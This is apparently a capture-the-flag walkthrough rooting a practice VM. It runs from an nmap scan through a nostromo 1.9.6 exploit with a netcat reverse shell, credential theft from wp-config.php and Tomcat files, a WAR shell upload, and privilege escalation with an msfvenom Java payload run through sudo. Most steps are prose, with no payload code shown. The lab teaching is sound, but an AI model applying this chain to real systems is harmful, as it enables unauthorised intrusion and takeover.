You can download the machine from
Goal: Get the root flag of the target.
Difficulty: Medium/Intermediate Level
Lab Setup:-
Download this machine from the link and import it into the virtual box.
Network Mode: Bridge Adapter
Here My machine ip is 192.168.1.211
Let’s start with reconnaissance.
┌──(root💀kali)-[/home/danial/Desktop/InfosecWarrior/My_Web_server]
└─# nmap -sV -sC -A -vv -oA nmap -p- 192.168.1.211
Here multiple port is open.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
2222/tcp open http syn-ack nostromo 1.9.6
3306/tcp open mysql syn-ack MySQL (unauthorized)
8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open http syn-ack nginx 1.14.2
After hitting Port 80 Found WordPress website is hosted, and after hitting any random page found it is bind with the domain so let’s add an entry in the host file.
After enumerating nothing found intresting in Port 80
So i’m moving forward to port 2222
Found exploit for nostromo 1.9.6.
Exploit is working properly its time to get the shell.
I tried with bash shell but it is not working so i downloaded nc package manually in the server and using it for the reverse shell.
Okay! So we got a shell of daemon,
In the passwd file found there is an entry of tomcat user, so first let’s try to get the tomcat privileges.
After enumerating find database credentials in wp-config.php file
In the database got the wordpress hash, But now we are searching for the tomcat credentials, we can keep the credentials.
After running
daemon@webserver:/var/www/html/site1$ find / -user tomcat 2>/dev/null
Got tomcat directory and in the tomcat directory got the credentials.
Now let’s login with tomcat credentials and get the tomcat previleges.
Okay!!
So now we are logged in, its tile to upload a shell.
I’m uploading a war shell to gain the access.
After uploading a shell let’s start a listner and gain access to it.
and we found we can execute /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java as a super user.
So for root we have to again use msfvenom to genrate java payload.
Now send this file using any of the methods I’m going forward to start the python server and download the file to the server using wget.
call it by using the /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java with sudo previleges.
And start your listner.
Boom !!
We got a root | Happy Hacking.